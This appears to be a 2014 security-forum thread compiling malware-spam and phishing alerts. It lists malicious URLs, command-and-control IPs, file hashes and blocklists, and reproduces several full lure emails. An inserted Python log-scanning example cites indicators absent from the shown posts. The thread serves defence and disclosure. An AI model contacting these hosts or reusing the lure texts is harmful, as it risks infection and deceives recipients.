Despite appearances, the link in the email (in this case) actually goes to https ://www.cubbyusercontent .com/pl/Invoice_032414.zip/_8deb77d3530f43be8a3166544b8fee9d and it downloads a file Invoice_032414.zip. This in turn contains a malicious executable Invoice_032414.exe which has a VirusTotal detection rate of 3/53*. The Malwr report shows HTTP conversations with the following URLs:
http :// 188.165.214.6 :15600/1710uk3/HOME/0/51-SP3/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/1/0/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/41/5/1/
http :// tonysenior .co.uk/images/IR/1710uk3.osa
188.165.214.6 is (not surprisingly) allocated to OVH France. In turn, it drops an executable bcwyw.exe (VT 6/54**...) which communicates with 66.102.253.25 (a China Telecom address located in the US in a Rackspace IP range) and also moxbk.exe (VT 1/52***...).
Recommended blocklist:
188.165.214.6
66.102.253.25
tonysenior .co.uk "
* https://www.virustotal.com/en-gb/file/a772bdadac8a2f4819519e3ffb10a4aca141d64d78660e78e6f42a6ceb509183/analysis/1413539374/
... Behavioural information
DNS requests
tonysenior .co.uk (66.7.214.212)
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
66.7.214.212: https://www.virustotal.com/en-gb/ip-address/66.7.214.212/information/
** https://www.virustotal.com/en-gb/file/30dc00ee245dc553d569b94cc13f1acfed70740c7c10405d164694bc7d065f9d/analysis/1413540238/
*** https://www.virustotal.com/en-gb/file/3a281070d196e0906851550c51c319843c0c99198a2f7b2e393e433aa0cb0b68/analysis/1413540261/
___
Fake 'SalesForce Security Update' SPAM – malware
- http://myonlinesecurity.co.uk/october-17-2014-salesforce-security-update-malware/
17 Oct 2014 - "'October 17, 2014 SalesForce Security Update' pretending to come from SalesForce .com <no-reply@ salesforce .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The malware inside this zip file is at this time -undetected- by any antivirus on Virus Total* and to make it much worse the Virus Total engine tries to tell you that the file is Probably harmless! There are strong indicators suggesting that this file is safe to use. This is an even bigger problem than it normally would be because of the recent Poodle bug and servers consequently changing their encryption routines to remove the vulnerable SSLv3 version from being used. It is eminently believable that you might need to change the SSL certificate on your browser to comply with the new behaviour if you are not a security or network IT specialist. This is obviously -wrong- and this type of malware that disguises itself as a legitimate file and can apparently conceal the malicious functions from an antivirus scan and make it believe it is innocent is very worrying. The MALWR analysis doesn’t show -anything- wrong and doesn’t show any network connections or other files downloaded. Anubis also comes up with -nothing- on this one... a couple of manual analyses done by Virus total** users who find it -is- malicious... drops this file which -is- detected... Our friends at TechHelpList(1) have done an analysis on this one which clearly shows its bad behaviour and what it connects to and downloads...
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/
** https://www.virustotal.com/en/file/93691ef6e834951225ad024a6b662e857a47c2f5156e3def9f38ae964143c241/analysis/
1) https://techhelplist.com/index.php/spam-list/664-date-salesforce-security-update-virus
The email looks like:
Dear client,
You are receiving this notification because your Salesforce SSL certificate has expired.
In order to continue using Salesforce.com, you are required to update your digital certificate.
Download the attached certificate. Update will be automatically installed by double click.
According to our Terms and Conditions, failing to renew the SSL certificate will result in account suspension or cancelation... Thank you for using Salesforce .com
17 October 2014: cert_update.zip: Extracts to: cert_update.scr
Current Virus total detections: 0/52* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an icon of a white & red circular arrow instead of the .scr ( executable) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/
___
Fake eFax SPAM
- http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html
17 Oct 2014 - "This fake eFax spam leads to malware:
From: eFax [message@ inbound .claranet .co.uk]
Date: 17 October 2014 11:36
Subject: eFax message from "02086160204" - 1 page(s), Caller-ID: 208-616-0204
Fax Message [Caller-ID: 208-616-0204]
You have received a 1 page fax at 2014-10-17 09:34:48 GMT.
* The reference number for this fax is lon2_did11-4056638710-9363579926-02.
Please visit... to view this message in full...
The link in the email goes to some random hacked WordPress site or other with a URL with a format similar to the following:
http ://tadarok .com/wp-content/themes/deadline/mess.html
http ://107.170.219.47 /wp-content/themes/inove/mess.html
http ://dollfacebeauty .com.au/wp-content/themes/landscape/mess.html
Then (if your user agent and referrer are correct) it goes to a -fake- eFax page at http ://206.253.165.76 :8080/ord/ef.html which does look pretty convincing. (Incidentally if the UA or referrer are not right you seem to get dumped on a pills site of naturaldietpills4u .com).
Screenshot: https://1.bp.blogspot.com/-IzglVG8I_co/VED-m9ehHQI/AAAAAAAAF2Y/HyA5Tk30D9E/s1600/efax2.png
The download link goes to http ://206.253.165.76: 8080/ord/FAX_20141008_1412786088_26.zip which is a ZIP file containing a malicious executable FAX_20141008_1412786088_26.exe which has a VirusTotal detection rate of 4/54*... Recommended blocklist:
107.170.19.156
212.59.117.207
206.253.165.76 "
* https://www.virustotal.com/en-gb/file/b2b9486a36dff94a3222c16d309c073da61a98dfa1c1d303b5d3740f54842ff6/analysis/1413545028/
___
Fake Virgin Media SPAM - phish/malware
- http://myonlinesecurity.co.uk/help-advice-virgin-media-malware/
17 Oct 2014 - "An email with a subject of 'Help & Advice – Virgin Media' pretending to come from Virgin Media is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Virgin Media Automated Billing Reminder
Date 17th October 2014
This e-mail has been sent you by Virgin Media to inform you that we were unable to process your most recent payment of bill. This might be due to one of the following reasons:
A recent change in your personal information such as Name or address.
Your Credit or Debit card has expired.
Insufficient funds in your account.
Cancellation of Direct Debit agreement.
Your Card issuer did not authorize this transaction.
To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.
Please click on the link below to login to e-Billing. You will need to login using your primary E-mail address...
Be very careful with email attachments. -All- of these emails use Social engineering tricks to persuade you to open the attachments or follow the links... -Never- just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most ( if not all) malicious files that are attached to emails will have a -faked- extension..."
___
More Free Facebook Hacks ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/more-free-facebook-hacking-sites-surface-online/
Oct 16, 2014 - "... more sites claiming to offer hacking services that target Facebook users. The sites are:
fbwand(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/fbwand.png
hackfbaccountlive(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackfbaccountlive.png
One starts off by entering the profile URL of the Facebook user account (the target) he/she wants to hack. The site then makes him/her believe that an -actual- hacking is ongoing, firstly, by retrieving and displaying specific information from Facebook’s Graph Search*, such as user ID, user name, and a large version of the profile photo, to the page; and, secondly, by providing the attacker the progress of completion of each hacking attempt. Below are screenshots of these attempts, beginning with purportedly fetching the target’s email ID:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/05-verify.png?w=564
After a successful “hack”, the site informs the attacker that they have created an account for them on the website, complete with a generated user name and password, and that they have to log in to their accounts to retrieve the target’s Facebook account details. Just when it seems too easy, the attacker sees this upon logging in:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackers-panel.png
He/She is instructed to unlock the details in two ways. One is to share a generated referral link to their social networks (particularly Facebook and/or Twitter) in order to get 15 visitors to click it... Although it’s true that no website is perfectly secure, one must not attempt to hack into them nor break into someone else’s online profile. These are illegal acts. Sites marketing themselves as free, user-friendly hacking-as-a-service (HaaS) tools, such as those I mentioned here, generally take advantage of user distrust against someone and profit on it, promising big but delivering nothing in the end. Avoid them at all costs."
* https://www.facebook.com/about/graphsearch
___
Ebola Phishing Scams and Malware Campaigns
- https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014 - "... protect against email scams and cyber campaigns using the Ebola virus disease (EVD) as a theme. Phishing emails may contain links that direct users to websites which collect personal information such as login credentials, or contain malicious attachments that can infect a system. Users are encouraged to use caution when encountering these types of email messages and take the following preventative measures to protect themselves:
- Do not follow unsolicited web links or attachments in email messages.
- Maintain up-to-date antivirus software..."
___
CUTWAIL Spambot Leads to UPATRE-DYRE Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/cutwail-spambot-leads-to-upatre-dyre-infection/
Oct 16, 2014 - "... a new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, which ultimately downloads its final payload, a BANKER malware related to the DYREZA/DYRE banking malware... In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009. We spotted some spammed emails that disguise themselves as invoice message notifications or “new alert messages” from various companies and institutions.
Screenshot of spammed messages related to CUTWAIL/PUSHDO:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Cutwail_samples.jpg
Top spam sending countries for this CUTWAIL spam run:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Top-spam-sending-countries-01.jpg
... Based on our 1H 2014 spam report, UPATRE is the top malware seen in spam emails. With its continuously developing techniques, UPATRE remains as one of most prevalent malware today. Examples of newer UPATRE techniques are its ability to use password-protected archives as attachments, and abuse of online file storage platform, Dropbox in order to bypass spam filters.
Top malware distributed via spam as of August 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/CUTWAIL-Spambot_fig1.jpg
... in this attack, this UPATRE variant, TROJ_UPATRE.YYJS downloads the final payload, TSPY_BANKER.COR, which is related to DYREZA/DYRE banking malware. The DYREZA malware is a banking malware with the following capabilities:
- Performs man-in-the-middle attacks via browser injections
- Steals banking credentials and monitors online banking session/transactions
- Steals browser snapshots and other information
Based on our analysis, TSPY_BANKER.COR connects to several websites to receive and send information. Given this series of malware infections, affected systems also run the risk of having their sensitive data stolen (such as banking credentials data) in order to be used for other future attacks. Apart from the risk of stolen information, this spam attack also highlights the risk of traditional threats (like spam) being used as a vehicle for -other- advanced malware to infect systems. This may consequently even lead to infiltrating an entire enterprise network... We highly recommend that users take extra caution when dealing with emails that contain attachments and URLs in the email body. Ensure that the domains are legitimate and take note of the company name indicated in the email. Another tip is to steer clear of suspicious-looking archive files attached to emails, such as those ending in .ZIP, or .RAR. UPATRE is also known to use email templates through DocuSign with emails that come in the form of -bank- notifications, -court- notices, and -receipts- ..."
___
WhatsApp Spam
- http://threattrack.tumblr.com/post/100162392338/whatsapp-spam
Oct 16, 2014 - "Subjects Seen:
Voice Message Notification
Typical e-mail details:
You have a new voicemail!
Details:
Time of Call: Oct-13 2014 06:02:04
Lenth of Call: 07sec
Malicious URLs:
p30medical .com/dirs.php?rec=LLGIAmEUFLipINmiPz4S0g
Malicious File Name and MD5:
VoiceMail.zip (713A7D2A9930B786FE31A603CD06B196)
VoiceMail.exe (2B7E9FC5A65FE6927A84A35B5FEAC062)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/5fe4acaac97621cafb4688b950049ac6/tumblr_inline_ndjlwzSYyI1r6pupn.png
Tagged: Whatsapp, Kuluoz
:fear::fear: :mad:
AplusWebMaster
2014-10-19, 07:00
FYI...
Evil network: 5.135.230.176/28 - OVH
- http://blog.dynamoo.com/2014/10/evil-network-513523017628-ovh-eldar.html
18 Oct 2014 - "These domains are currently hosted or have recently been hosted on 5.135.230.176/28 and all appear to be malicious in some way, in particular some of them have been hosting the Angler EK* (hat tip)... 5.135.230.176/28 is an OVH IP range allocated to what might be a fictitious customer:
organisation: ORG-EM25-RIPE
org-name: eldar mahmudov
org-type: OTHER
address: ishveran 9
address: 75003 paris
address: FR
e-mail: mahmudik@ hotmail .com
abuse-mailbox: mahmudik@ hotmail .com
phone: +33.919388845
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ ovh .net 20140621
source: RIPE
There appears to be nothing legitimate at all in this IP address range, I strongly recommend that you -block- traffic going to it."
* http://malware-traffic-analysis.net/2014/10/06/index.html
Diagnostic page for AS16276 (OVH)
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 4009 site(s)... resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-10-18, and the last time suspicious content was found was on 2014-10-18... we found 543 site(s) on this network... that appeared to function as intermediaries for the infection of 4498 other site(s)... We found 1150 site(s)... that infected 2883 other site(s)..."
___
malwr
- https://malwr.com/
Oct. 19, 2014 - "Last Comments:
Malware.
222.236.47.53:8080 195.206.7.69:443 46.55.222.24:8080 162.144.60.252:8080 91.212.253.253:443 95.141.32.134:8080"
- https://malwr.com/about/ >> http://www.shadowserver.org/ *
- 222.236.47.53: https://www.virustotal.com/en/ip-address/222.236.47.53/information/
- 195.206.7.69: https://www.virustotal.com/en/ip-address/195.206.7.69/information/
- 46.55.222.24: https://www.virustotal.com/en/ip-address/46.55.222.24/information/
- 162.144.60.252: https://www.virustotal.com/en/ip-address/162.144.60.252/information/
- 91.212.253.253: https://www.virustotal.com/en/ip-address/91.212.253.253/information/
- 95.141.32.134: https://www.virustotal.com/en/ip-address/95.141.32.134/information/
Bot Count Graphs
* https://www.shadowserver.org/wiki/pmwiki.php/Stats/BotCountYearly#toc1
Page last modified on Sunday, 19 October 2014
___
- http://blog.dynamoo.com/2014/10/final-notification-malware-spam-uses.html
17 Oct 2014
... ShippingLable_HSDAPDF.scr
- https://www.virustotal.com/en/file/9ad980467347dffbb50493c93ca834c40dbfdec61fc1339004a107aef6633ed2/analysis/1413566277/
... Comments:
Full list of CnCs:
5.135.28.118: https://www.virustotal.com/en/ip-address/5.135.28.118/information/
185.20.226.41: https://www.virustotal.com/en/ip-address/185.20.226.41/information/
5.63.155.195: https://www.virustotal.com/en/ip-address/5.63.155.195/information/
___
RIG Exploit Kit Dropping CryptoWall 2.0
- http://www.threattracksecurity.com/it-blog/rig-exploit-kit-dropping-cryptowall-2-0/
Oct 17, 2014 - "... observed spammers exploiting vulnerable WordPress links to -redirect- users to servers hosting the RIG Exploit Kit, which takes advantage of any number of vulnerabilities in unpatched Silverlight, Flash, Java and other applications to drop CryptoWall 2.0... nasty updated version of CryptoWall, which has built up steam since the disruption of CryptoLocker. Once infected with CryptoWall 2.0, users’ files are encrypted and held for ransom. The spammers behind this latest campaign seem to be the same crew behind a recent wave of eFax spam reported over at Dynamoo’s Blog*... The campaign Dynamoo revealed is being hosted side-by-side on the same server as the RIG Exploit Kit: hxxp ://206.253.165.76 :8080. The exploit redirector is hxxp ://206.253.165.76 :8080/ord/rot.php. And the spam Dynamoo reported is hxxp ://206.253.165.76 :8080/ord/ef.html... The exploit redirector is hxxp :// 206.253.165.76 :8080/ord/rot.php... malicious link loads a RIG Exploit Kit landing page to exploit any of its targeted vulnerabilities to drop CryptoWall 2.0. The MD5 of the sample analyzed is 8cc0ccec8483dcb9cfeb88dbe0184402 ..."
* http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html
206.253.165.76: https://www.virustotal.com/en/ip-address/206.253.165.76/information/
:mad: :fear:
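Several of the write-ups above end in a "recommended blocklist" (188.165.214.6 and 66.102.253.25 for the Sage/Barclays Upatre runs, 206.253.165.76 and its two companions for the eFax/RIG campaign, the whole 5.135.230.176/28 OVH range, and the payload hosts jwoffroad.co.uk, lewis-teck.co.uk and tonysenior.co.uk). The following is an added example (not code from dynamoo.com or the original posts) of turning those indicators into a retrospective sweep of proxy logs: single IPs, CIDR ranges and domains (with subdomains) are matched against the destination host of each request, and the non-standard ports in the check-in URLs (:12302, :15600, :8080) are stripped rather than defeating the match. The log lines are constructed in a squid-like layout and are not real traffic.

```python
"""Match web-proxy log lines against the blocklists quoted on this page.

Added example, not code from dynamoo.com or the original posts.  The
indicators are the ones named in the posts above; the log lines are
constructed in a squid-like access.log layout and are not real traffic.
"""
import ipaddress
from urllib.parse import urlsplit

BLOCK_IPS = ["188.165.214.6", "66.102.253.25", "206.253.165.76",
             "107.170.19.156", "212.59.117.207"]
BLOCK_NETS = ["5.135.230.176/28"]
BLOCK_DOMAINS = ["jwoffroad.co.uk", "lewis-teck.co.uk", "tonysenior.co.uk"]


class Blocklist:
    def __init__(self, ips, nets, domains):
        self.ips = {ipaddress.ip_address(i) for i in ips}
        self.nets = [ipaddress.ip_network(n) for n in nets]
        self.domains = {d.lower().strip(".") for d in domains}

    def match_host(self, host):
        """Return the indicator a host matches, or None."""
        host = (host or "").lower().strip(".")
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            # Not an IP literal: exact domain or any subdomain of one.
            for d in self.domains:
                if host == d or host.endswith("." + d):
                    return d
            return None
        if addr in self.ips:
            return str(addr)
        for net in self.nets:
            if addr in net:           # CIDR containment, e.g. the /28 above
                return str(net)
        return None


def host_of(url):
    """Host part of a URL; urlsplit drops the :12302 / :8080 ports that the
    Upatre check-in and RIG URLs above carry."""
    return urlsplit(url).hostname or ""


def scan_log(lines, blocklist):
    """Squid native format: ts elapsed client code/status bytes method url ...
    Returns (client, url, matched indicator) for every blocked destination."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        client, url = fields[2], fields[6]
        ioc = blocklist.match_host(host_of(url))
        if ioc:
            hits.append((client, url, ioc))
    return hits


# Constructed sample log; timestamps and client addresses are made up.
SAMPLE_LOG = [
    "1413539374.123 412 10.1.2.33 TCP_MISS/200 1820 GET http://188.165.214.6:15600/1710uk3/HOME/0/51-SP3/0/ - DIRECT/188.165.214.6 text/html",
    "1413539375.001 55 10.1.2.33 TCP_MISS/200 51200 GET http://tonysenior.co.uk/images/IR/1710uk3.osa - DIRECT/66.7.214.212 application/octet-stream",
    "1413545028.500 30 10.1.2.41 TCP_MISS/200 7000 GET http://206.253.165.76:8080/ord/ef.html - DIRECT/206.253.165.76 text/html",
    "1413545029.000 20 10.1.2.41 TCP_MISS/200 900 GET http://5.135.230.180/index.php - DIRECT/5.135.230.180 text/html",
    "1413545030.000 10 10.1.2.50 TCP_HIT/200 3000 GET https://www.example.com/ - HIER_NONE/- text/html",
]

if __name__ == "__main__":
    bl = Blocklist(BLOCK_IPS, BLOCK_NETS, BLOCK_DOMAINS)
    for client, url, ioc in scan_log(SAMPLE_LOG, bl):
        print(f"{client} -> {url}  [{ioc}]")
```

Matching on the parsed host rather than on a substring of the raw line matters here: a substring rule for "188.165.214.6" would also fire on "188.165.214.60", and a rule keyed on "188.165.214.6:12302" would miss the :15600 run two days later. The sweep also reports which indicator fired, so a hit on the /28 can be escalated differently from a hit on a single payload host.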
AplusWebMaster
2014-10-20, 14:41
FYI...
Fake 'unpaid invoice' SPAM - xls malware
- http://myonlinesecurity.co.uk/acorn-engineering-limited-trading-unpaid-invoice-court-action-fake-excel-xls-malware/
20 Oct 2014 - "An email pretending to be an unpaid invoice and threatening court action with a subject of 'Acorn Engineering Limited trading' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Acorn-Maintenance-Engineering-logo...
October 20, 2014
Head Office
Acorn Engineering Limited trading
as Acorn Maintenance
Acorn House
20 Wellcroft Road
Slough
Berkshire
SL1 4AQ
Tel: 01753 386 073
Fax: 01753 409 672
Dear ...
Reference: 48771955-A8
Court action will be the consequence of your ignoring this letter.
Despite our telephone calls on October 10 and our letters of September 25, 2014 and October 20, 2014, and your promise to pay, payment of your account has still not been received. If full payment is not received by October 22, 2014 court action will be taken against your company.
If you allow this to happen you will incur court costs and you may forfeit your company’s credit status because the name of your company will be recorded by the major credit reference agencies. This may deter others from supplying you.
You are also being charged debt recovery costs and statutory interest of 8% above the reference rate (fixed for the six month period within which date the invoices became overdue) pursuant to the late payment legislation.
To stop this from happening please pay in full now the overdue invoice which is also attached to this letter.
Yours truly,
signature-Mishenko.gif (626×272)
Nadine Cox,
Accountant
Acorn Engineering Limited
Enclosure (Attachment)
20 October 2014: Copy4313_B0.zip: Extracts to: Invoice_7380901925299.xls.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Excel xls file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/02b93640df6c19e6e77de029688e7dc2cdf6cf0a8a8f68ea0e1777d2ddd98097/analysis/1413800273/
___
Fake PDF invoice SPAM
- http://www.symantec.com/connect/blogs/pdf-invoices-may-cost-more-you-expect
Oct 20, 2014 - "... Over the past week, Symantec has observed a spam campaign involving suspicious emails that masquerade as unpaid invoices. However, these suspicious emails come with a nasty surprise attached in the form of a malicious .pdf file.
Malicious .pdf file attached to suspicious email:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Fig1_19.png
While these invoices may appear to be legitimate because the sender’s email address may be associated with a major company, the emails contain spelling errors in the subject line and the body of the email contains just one line of text. Most business emails contain a personal greeting to the recipient and the sender’s signature, but these emails have neither. These signs should serve as warnings to users that the email is not what it claims to be. The attached .pdf file has malicious shellcode hidden inside of it that will be executed when opened with a vulnerable version of Adobe Reader... attackers are trying to exploit the Adobe Acrobat and Reader Unspecified Remote Integer Overflow Vulnerability (CVE-2013-2729) by triggering the vulnerability while parsing the crafted Bitmap encoded image... The embedded shellcode acts as a downloader which downloads a malicious executable file (Infostealer.Dyranges) from a remote location. The downloaded malware attempts to install itself as a service called “google update service”... If successful, the malware is then able to steal confidential information entered into Web browsers by the user. Symantec recommends that users exercise caution when opening emails and attachments from unexpected or unknown senders. We also advise that PDF viewers and security software be kept up-to-date. Symantec detects the malicious .pdf file used in this campaign as Trojan.Pidief*."
* http://www.symantec.com/security_response/writeup.jsp?docid=2009-121708-1022-99&tabid=2
___
Fake 'LogMeIn Security Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/october-16-2014-logmein-security-update-fake-pdf-malware/
20 Oct 2014 - "An email that says it is an announcement that you need to install a new 'LogMeIn security certificate' which pretends to come from LogMeIn .com < auto-mailer@ logmein .com > with a subject of October 16, 2014 'LogMeIn Security Update' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/LogMeIn-security-update.png
20 October 2014: cert_client.zip: Extracts to: cert_1020.scr
Current Virus total detections: 1/52* . This October 16, 2014 'LogMeIn Security Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a legitimate file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/19d11eec77e1f1b6179005277d67a8640b5f5bf573dac486c7e1e6baea227c59/analysis/1413811609/
___
Fake 'my new photo ;)' SPAM - trojan variant
- http://blog.mxlab.eu/2014/10/20/latest-email-my-new-photo-contains-a-new-trojan-variant/
Oct 20, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “my new photo ;)”... sent from the spoofed email addresses and has the following short body:
my new photo ;)
The attached ZIP file has the name photo.zip; once extracted, a folder named photo is available that contains the 57 kB file photo.exe. The trojan is known as a variant of HEUR/QVM03.0.Malware.Gen or Win32:Malware-gen. At the time of writing, 2 of the 53 AV engines detected the trojan at Virus Total*..."
* https://www.virustotal.com/en-gb/file/83912dc14a7de0ae2dbc6f12f2a5dbb54e2d94861ec6214163eaa2031df1b9b5/analysis/1413812842/
___
Fake Invoice SPAM – word doc malware
- http://myonlinesecurity.co.uk/adobe-invoice-word-doc-malware/
20 Oct 2014 - "An email pretending to come from Adobe with the subject of 'Adobe Invoice' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has an attachment that looks like a proper word.doc but something has disinfected all copies on its travels. All copies that I have received have been -less- than 1kb in size and are empty files with only a name, adb-102288-invoice.doc. They are almost certainly supposed to be the typical malformed word docs that contain a macro script -virus- we have been seeing so much recently, which will infect you if you open or even preview them when you have an out of date or vulnerable version of Microsoft Word on your computer... The email looks like:
Adobe(R) logo
Dear Customer,
Thank you for signing up for Adobe Creative Cloud
Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service...
Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most (if not all) malicious files that are attached to emails will have a faked extension..."
- http://blog.dynamoo.com/2014/10/adobe-billing-adobe-invoice-spam-adb.html
20 Oct 2014
Screenshot: https://1.bp.blogspot.com/-mt-vGbR2Q-U/VEUFltRbPGI/AAAAAAAAF3E/b3_TOFcDpHk/s1600/adobe.png
> https://www.virustotal.com/en-gb/file/bc79dea26a2ec94646dcbad540d3921198c46701359539925e530839aa68fb13/analysis/1413809174/
... Behavioural information
TCP connections
62.75.182.94: https://www.virustotal.com/en-gb/ip-address/62.75.182.94/information/
208.89.214.177: https://www.virustotal.com/en-gb/ip-address/208.89.214.177/information/
___
Dropbox phish - hosted on Dropbox
- http://www.symantec.com/connect/blogs/dropbox-users-targeted-phishing-scam-hosted-dropbox
Updated: 18 Oct 2014 - "... In this scam, messages included links to a -fake- Google Docs login page hosted on Google itself. We continue to see millions of phishing messages every day, and recently we saw a similar scam targeting Dropbox users. The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a -fake- Dropbox login page, hosted on Dropbox itself.
Fake Dropbox login page:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%201.png
The -fake- login page is hosted on Dropbox's user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing. The page looks like the real Dropbox login page, but with one crucial difference. The scammers are interested in phishing for more than just Dropbox credentials; they have also included logos of popular Web-based email services, suggesting that users can log in using these credentials as well. After clicking "Sign in," the user’s credentials are sent to a PHP script on a compromised Web server. Credentials are also submitted over SSL, which is critical for the attack's effectiveness. Without this, victims would see an unnerving security warning.
Security warning:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%202.jpg
Upon saving or emailing the user's credentials to the scammer, the PHP script simply -redirects- the user to the real Dropbox login page. Although the page itself is served over SSL, and credentials are sent using the protocol, some resources on the page (such as images or style sheets) are not served over SSL. Using non-SSL resources on a page served over SSL shows warnings in recent versions of some browsers. The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications. Symantec reported this phishing page to Dropbox and they immediately took the page down..."
:fear::fear: :mad:
AplusWebMaster
2014-10-21, 15:06
FYI...
Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/humber-merchants-group-industrial-invoices-word-doc-malware/
21 Oct 2014 - "An email pretending to come from 'Humber Merchants Group' ps [random number]@humbermerchants .co.uk with a word document attachment and the subject of 'Industrial Invoices' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Attached are accounting documents from Humber Merchants
Humber Merchants Group
Head Office:
Parkinson Avenue
Scunthorpe
North Lincolnshire
DN15 7JX
Tel: 01724 860331
Fax: 01724 281326 ...
21 October 2014: 15040BII3646501.doc - Current Virus total detections: 0/52*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2471f4a0febbfede40f5d700553eb28d97519ac49454bcc79f0fb7383559198b/analysis/1413890645/
___
Fake Adobe Invoice Spam
- http://threattrack.tumblr.com/post/100594804508/adobe-invoice-spam
Oct 21, 2014 - "Subjects Seen:
Adobe Invoice
Typical e-mail details:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a62cae97486096c615aa19538d2b5ebb/tumblr_inline_ndt0qkAetU1r6pupn.png
Malicious File Name and MD5:
invoice.zip (CABA79FCEB5C9FEF222C89C423AA2485)
invoice.exe (29684FBB98C1883A7A08977CB23E90B6)
Tagged: Adobe, Wauchos
___
Fake Invoice SPAM - malware
- http://myonlinesecurity.co.uk/please-find-attached-pi-copies-invoice-malware/
21 Oct 2014 - "An email pretending to come from cato-chem .com < sales@ cato-chem .com > with a fake invoice and a subject of 'Please find attached PI copies of Invoice' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/cato-chem_fake-invoice.png
21 October 2014: proforma invoice.zip: Extracts to proforma invoice.exe
Current Virus total detections: 17/54*. This Please find attached PI copies of Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a barcode as the icon instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/331d8fbfd2eecd6141a0bc61d3091c1d7e0311a0d8b6c0a29e500052f99c1ac2/analysis/1413858604/
___
ThetaRay turns to maths to detect cyber threats
- http://www.reuters.com/article/2014/10/21/us-thetaray-cybersecurity-idUSKCN0IA1JV20141021
